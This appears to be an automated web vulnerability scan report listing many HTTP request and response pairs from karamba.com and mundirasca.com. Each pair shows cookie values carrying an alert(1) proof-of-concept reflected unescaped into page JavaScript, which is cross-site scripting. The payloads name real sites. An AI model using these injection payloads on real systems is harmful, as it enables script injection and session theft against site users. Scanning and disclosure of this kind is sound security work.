GET /Responsible.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMdd25a" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 51885 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMdd25a"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Sitemap.aspx |
GET /Sitemap.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/ Set-Cookie: BO=FM197d8"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71274 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM197d8"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Sitemap.aspx |
GET /Sitemap.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM866e2" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71274 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM866e2"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/ Set-Cookie: BO=FM2bbb0"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 108568 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM2bbb0"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMe47a2" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 108569 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMe47a2"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/ Set-Cookie: BO=FMc835b"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44973 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMc835b"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMb27e8" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:19 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44973 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMb27e8"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /click/Karamba.com/ENG |
GET /click/Karamba.com/ENG Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/ Set-Cookie: BO=FMaa02b"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:48 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44724 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMaa02b"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.karamba.com |
Path: | /click/Karamba.com/ENG |
GET /click/Karamba.com/ENG Host: www.karamba.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:39:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM27ef6" Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/ Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/ Set-Cookie: CSITemp=27; domain=karamba.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44724 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM27ef6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | / |
GET / HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/ Set-Cookie: BO=FMe90c5"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37133 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMe90c5"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | / |
GET / HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM34c2f" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37133 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM34c2f"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/ Set-Cookie: BO=FM2eacb"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:07 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37898 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM2eacb"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM680d9" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:34 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 37898 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM680d9"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /ContactUsChat.aspx |
GET /ContactUsChat.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/ Set-Cookie: BO=FM7bca8"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM7bca8"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /ContactUsChat.aspx |
GET /ContactUsChat.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMca168" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMca168"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /ContactUsFax.aspx |
GET /ContactUsFax.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/ Set-Cookie: BO=FMc2f13"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:04 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36346 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMc2f13"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /ContactUsFax.aspx |
GET /ContactUsFax.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM1ba74" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:45 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36346 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM1ba74"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/ Set-Cookie: BO=FM9ff03"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44057 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM9ff03"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM3545f" Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/ Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/ Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44057 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM3545f"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mundirasca.com |
Path: | /ContactUsTel.aspx |
GET /ContactUsTel.aspx HTTP/1.1 Host: www.mundirasca.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CSI_17=EncryptedUniq |
